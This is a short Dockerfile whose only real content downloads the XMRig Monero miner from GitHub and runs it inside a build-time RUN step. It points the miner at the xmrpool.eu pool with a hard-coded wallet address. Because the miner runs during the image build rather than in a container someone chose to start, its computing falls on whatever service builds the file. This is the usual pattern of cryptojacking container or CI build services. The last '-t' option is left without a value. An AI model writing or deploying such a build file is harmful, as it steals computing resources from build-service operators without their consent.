FROM ubuntu:latest
WORKDIR /home
RUN apt-get update -y
RUN apt install wget -y
#mine
RUN wget https://github.com/xmrig/xmrig/releases/download/v6.12.1/xmrig-6.12.1-linux-static-x64.tar.gz
RUN tar xf xmrig-6.12.1-linux-static-x64.tar.gz
WORKDIR xmrig-6.12.1
RUN ./xmrig -o xmrpool.eu:9999 -u 43FN9N7ktZJAtr6nsvNdTtKHbuCJAER7L9srybAMPNWBHzGk98f3jiTNGRkBfgeEDRQan9PwdYfFwEDrKq9DH7ck8K19JPD -k --tls --print-time 5 -t